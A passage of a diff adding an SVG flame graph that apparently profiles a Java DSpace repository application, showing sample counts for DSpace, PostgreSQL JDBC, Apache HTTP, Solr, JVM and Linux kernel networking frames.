+<text  x="412.78" y="671.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.18%)</title><rect x="461.4" y="869" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="464.37" y="879.5" ></text>
+</g>
+<g >
+<title>net_rx_action (96 samples, 8.74%)</title><rect x="230.3" y="933" width="103.2" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="233.31" y="943.5" >net_rx_action</text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (10 samples, 0.91%)</title><rect x="730.0" y="933" width="10.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="733.04" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 0.64%)</title><rect x="1101.9" y="789" width="7.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1104.88" y="799.5" ></text>
+</g>
+<g >
+<title>schedule_timeout (30 samples, 2.73%)</title><rect x="100.3" y="1157" width="32.2" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="103.27" y="1167.5" >sc..</text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.09%)</title><rect x="860.1" y="757" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="863.07" y="767.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (13 samples, 1.18%)</title><rect x="1017.0" y="949" width="13.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1019.98" y="959.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Encoder:::encode (1 samples, 0.09%)</title><rect x="406.6" y="901" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="409.56" y="911.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%)</title><rect x="860.1" y="773" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="863.07" y="783.5" ></text>
+</g>
+<g >
+<title>__check_block_validity.constprop.0 (1 samples, 0.09%)</title><rect x="11.1" y="1045" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="14.07" y="1055.5" ></text>
+</g>
+<g >
+<title>java/text/DateFormatSymbols:::initializeData (1 samples, 0.09%)</title><rect x="488.2" y="773" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="491.23" y="783.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (26 samples, 2.37%)</title><rect x="635.5" y="853" width="27.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="638.46" y="863.5" >J..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultClientConnection:::close (1 samples, 0.09%)</title><rect x="559.2" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="562.16" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::rewriteRequestURI (3 samples, 0.27%)</title><rect x="1075.0" y="933" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1078.01" y="943.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="878.3" y="773" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="881.34" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%)</title><rect x="881.6" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="884.57" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Community:::getParentCommunity (12 samples, 1.09%)</title><rect x="753.7" y="965" width="12.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="756.68" y="975.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_core (2 samples, 0.18%)</title><rect x="233.5" y="869" width="2.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="236.53" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="762.3" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="765.28" y="943.5" ></text>
+</g>
+<g >
+<title>tcp_send_ack (1 samples, 0.09%)</title><rect x="134.7" y="1173" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="137.66" y="1183.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (747 samples, 68.03%)</title><rect x="372.2" y="1269" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1279.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/text/DateFormat:::format (2 samples, 0.18%)</title><rect x="487.2" y="837" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="490.16" y="847.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="877.3" y="853" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="880.27" y="863.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.09%)</title><rect x="1129.8" y="981" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1132.82" y="991.5" ></text>
+</g>
+<g >
+<title>org/dspace/util/MultiFormatDateParser:::parse (1 samples, 0.09%)</title><rect x="1042.8" y="965" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1045.77" y="975.5" ></text>
+</g>
+<g >
+<title>netif_skb_features (1 samples, 0.09%)</title><rect x="343.2" y="949" width="1.0" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="346.15" y="959.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read (1 samples, 0.09%)</title><rect x="132.5" y="965" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="975.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1122.3" y="901" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1125.30" y="911.5" ></text>
+</g>
+<g >
+<title>call_stub (3 samples, 0.27%)</title><rect x="543.0" y="725" width="3.3" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="546.04" y="735.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="792.4" y="901" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="795.37" y="911.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (4 samples, 0.36%)</title><rect x="1035.2" y="853" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1038.25" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (10 samples, 0.91%)</title><rect x="409.8" y="901" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="412.78" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1090.1" y="901" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1093.05" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (63 samples, 5.74%)</title><rect x="1058.9" y="981" width="67.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1061.89" y="991.5" >org/apa..</text>
+</g>
+<g >
+<title>psi_task_change (4 samples, 0.36%)</title><rect x="109.9" y="1093" width="4.3" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="112.95" y="1103.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::resetChanged (1 samples, 0.09%)</title><rect x="819.2" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="822.23" y="927.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (1 samples, 0.09%)</title><rect x="1111.5" y="693" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1114.55" y="703.5" ></text>
+</g>
+<g >
+<title>ip_rcv_finish (1 samples, 0.09%)</title><rect x="1078.2" y="325" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="335.5" ></text>
+</g>
+<g >
+<title>eth_type_trans (1 samples, 0.09%)</title><rect x="339.9" y="933" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="342.93" y="943.5" ></text>
+</g>
+<g >
+<title>acpi_irq (1 samples, 0.09%)</title><rect x="790.2" y="693" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="703.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (1 samples, 0.09%)</title><rect x="567.8" y="949" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="570.76" y="959.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::getStackTraceElement (5 samples, 0.46%)</title><rect x="415.2" y="805" width="5.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="418.15" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1106.2" y="645" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1109.17" y="655.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (4 samples, 0.36%)</title><rect x="536.6" y="885" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="539.59" y="895.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (3 samples, 0.27%)</title><rect x="1017.0" y="933" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1019.98" y="943.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="1168.5" y="885" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1171.51" y="895.5" ></text>
+</g>
+<g >
+<title>crypt_endio (1 samples, 0.09%)</title><rect x="137.9" y="997" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="140.89" y="1007.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::writeTo (11 samples, 1.00%)</title><rect x="447.4" y="837" width="11.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="450.40" y="847.5" ></text>
+</g>
+<g >
+<title>ip_output (110 samples, 10.02%)</title><rect x="227.1" y="1061" width="118.2" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="230.09" y="1071.5" >ip_output</text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="740.8" y="773" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="743.78" y="783.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.09%)</title><rect x="436.6" y="757" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="439.65" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readSolrDocumentList (1 samples, 0.09%)</title><rect x="1125.5" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1128.52" y="943.5" ></text>
+</g>
+<g >
+<title>__remove_hrtimer (1 samples, 0.09%)</title><rect x="709.6" y="789" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="712.62" y="799.5" ></text>
+</g>
+<g >
+<title>java/text/SimpleDateFormat:::parse (1 samples, 0.09%)</title><rect x="1042.8" y="949" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1045.77" y="959.5" ></text>
+</g>
+<g >
+<title>pthread_cond_signal@@GLIBC_2.3.2 (1 samples, 0.09%)</title><rect x="371.1" y="1317" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="374.09" y="1327.5" ></text>
+</g>
+<g >
+<title>tcp_mstamp_refresh (1 samples, 0.09%)</title><rect x="135.7" y="1173" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="138.74" y="1183.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.09%)</title><rect x="827.8" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::write (2 samples, 0.18%)</title><rect x="457.1" y="821" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="460.07" y="831.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (23 samples, 2.09%)</title><rect x="202.4" y="1061" width="24.7" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="205.37" y="1071.5" >_..</text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.18%)</title><rect x="1024.5" y="805" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1027.50" y="815.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (61 samples, 5.56%)</title><rect x="13.2" y="1269" width="65.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="16.22" y="1279.5" >do_sysc..</text>
+</g>
+<g >
+<title>_raw_spin_lock (1 samples, 0.09%)</title><rect x="231.4" y="917" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="234.38" y="927.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="709.6" y="837" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="712.62" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="1147.0" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1150.01" y="959.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="821.4" y="773" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="824.38" y="783.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (2 samples, 0.18%)</title><rect x="1110.5" y="725" width="2.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1113.47" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="862.2" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="865.22" y="895.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="735.4" y="725" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="738.41" y="735.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.27%)</title><rect x="884.8" y="853" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="863.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="540.9" y="805" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="543.89" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::get (1 samples, 0.09%)</title><rect x="1149.2" y="933" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1152.16" y="943.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (1 samples, 0.09%)</title><rect x="1078.2" y="245" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="255.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="755.8" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="758.83" y="879.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (1 samples, 0.09%)</title><rect x="436.6" y="629" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="439.65" y="639.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getProperty (1 samples, 0.09%)</title><rect x="1015.9" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1018.90" y="975.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (1 samples, 0.09%)</title><rect x="696.7" y="789" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="699.72" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="745.1" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="748.08" y="895.5" ></text>
+</g>
+<g >
+<title>__vsnprintf_internal (1 samples, 0.09%)</title><rect x="12.1" y="1301" width="1.1" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="15.15" y="1311.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (6 samples, 0.55%)</title><rect x="876.2" y="949" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="879.19" y="959.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%)</title><rect x="827.8" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (7 samples, 0.64%)</title><rect x="710.7" y="853" width="7.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="713.69" y="863.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (2 samples, 0.18%)</title><rect x="918.1" y="581" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="921.11" y="591.5" ></text>
+</g>
+<g >
+<title>process_backlog (1 samples, 0.09%)</title><rect x="333.5" y="933" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="336.48" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="873.0" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="895.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.09%)</title><rect x="719.3" y="853" width="1.1" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="722.29" y="863.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::study (4 samples, 0.36%)</title><rect x="920.3" y="789" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="923.26" y="799.5" ></text>
+</g>
+<g >
+<title>tcp_cleanup_rbuf (2 samples, 0.18%)</title><rect x="133.6" y="1189" width="2.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="136.59" y="1199.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="790.2" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="793.22" y="831.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::toString (1 samples, 0.09%)</title><rect x="586.0" y="965" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="589.03" y="975.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (2 samples, 0.18%)</title><rect x="421.6" y="901" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.36%)</title><rect x="1185.7" y="1237" width="4.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1188.70" y="1247.5" ></text>
+</g>
+<g >
+<title>kfree_skbmem (2 samples, 0.18%)</title><rect x="92.8" y="1173" width="2.1" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="95.75" y="1183.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::clearParameters (1 samples, 0.09%)</title><rect x="869.7" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="872.74" y="927.5" ></text>
+</g>
+<g >
+<title>check_preempt_curr (2 samples, 0.18%)</title><rect x="271.1" y="597" width="2.2" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="274.15" y="607.5" ></text>
+</g>
+<g >
+<title>[libnet.so] (1 samples, 0.09%)</title><rect x="553.8" y="837" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="556.79" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (3 samples, 0.27%)</title><rect x="847.2" y="885" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="850.18" y="895.5" ></text>
+</g>
+<g >
+<title>ext4_dirty_inode (1 samples, 0.09%)</title><rect x="1139.5" y="645" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1142.49" y="655.5" ></text>
+</g>
+<g >
+<title>sk_stream_alloc_skb (16 samples, 1.46%)</title><rect x="174.4" y="1173" width="17.2" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="177.43" y="1183.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver (1 samples, 0.09%)</title><rect x="1078.2" y="309" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="319.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (3 samples, 0.27%)</title><rect x="715.0" y="789" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="717.99" y="799.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.09%)</title><rect x="177.7" y="1077" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="180.65" y="1087.5" ></text>
+</g>
+<g >
+<title>rb_insert_color (1 samples, 0.09%)</title><rect x="366.8" y="1189" width="1.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="369.79" y="1199.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestAuthenticationBase:::process (1 samples, 0.09%)</title><rect x="557.0" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="560.01" y="863.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::append (3 samples, 0.27%)</title><rect x="582.8" y="965" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="585.81" y="975.5" ></text>
+</g>
+<g >
+<title>nf_nat_ipv4_fn (1 samples, 0.09%)</title><rect x="220.6" y="1013" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="223.64" y="1023.5" ></text>
+</g>
+<g >
+<title>tcp_write_xmit (153 samples, 13.93%)</title><rect x="192.7" y="1141" width="164.4" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="195.70" y="1151.5" >tcp_write_xmit</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="867.6" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="831.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (4 samples, 0.36%)</title><rect x="853.6" y="773" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="856.62" y="783.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="810.6" y="885" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="813.64" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.18%)</title><rect x="1157.8" y="917" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.76" y="927.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.09%)</title><rect x="755.8" y="821" width="1.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="758.83" y="831.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (7 samples, 0.64%)</title><rect x="1134.1" y="965" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1137.12" y="975.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (4 samples, 0.36%)</title><rect x="820.3" y="853" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="863.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1165.3" y="949" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.28" y="959.5" ></text>
+</g>
+<g >
+<title>rcu_report_qs_rnp (1 samples, 0.09%)</title><rect x="964.3" y="805" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="967.32" y="815.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.18%)</title><rect x="812.8" y="789" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="815.79" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/RequestWrapper:::resetHeaders (1 samples, 0.09%)</title><rect x="1089.0" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1091.98" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (2 samples, 0.18%)</title><rect x="749.4" y="821" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="831.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::atom (2 samples, 0.18%)</title><rect x="926.7" y="757" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="929.70" y="767.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="407.6" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="410.63" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Ques:::match (2 samples, 0.18%)</title><rect x="918.1" y="597" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="921.11" y="607.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::Receive (1 samples, 0.09%)</title><rect x="857.9" y="773" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="860.92" y="783.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (2 samples, 0.18%)</title><rect x="870.8" y="949" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="873.82" y="959.5" ></text>
+</g>
+<g >
+<title>__fget (1 samples, 0.09%)</title><rect x="363.6" y="1205" width="1.0" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="366.57" y="1215.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%)</title><rect x="805.3" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="808.26" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1068.6" y="869" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1071.56" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (9 samples, 0.82%)</title><rect x="1144.9" y="965" width="9.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
